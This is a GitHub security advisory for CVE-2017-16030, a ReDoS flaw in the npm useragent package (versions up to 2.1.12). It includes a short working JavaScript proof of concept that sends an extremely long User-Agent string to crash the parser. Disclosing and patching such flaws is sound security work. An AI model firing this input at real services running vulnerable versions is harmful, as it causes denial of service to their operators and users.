Skip to content

ReDoS via long UserAgent header in useragent

High severity GitHub Reviewed Published Jul 24, 2018 to the GitHub Advisory Database • Updated Sep 6, 2023

Package

npm useragent (npm)

Affected versions

<= 2.1.12

Patched versions

2.1.13

Description

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Recommendation

Update to version 2.1.13 or later.

References

Published to the GitHub Advisory Database Jul 24, 2018
Reviewed Jun 16, 2020
Last updated Sep 6, 2023

Severity

High

EPSS score

0.124%
(48th percentile)

Weaknesses

CVE ID

CVE-2017-16030

GHSA ID

GHSA-pjmx-9xr3-82qr

Source code

No known source code
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.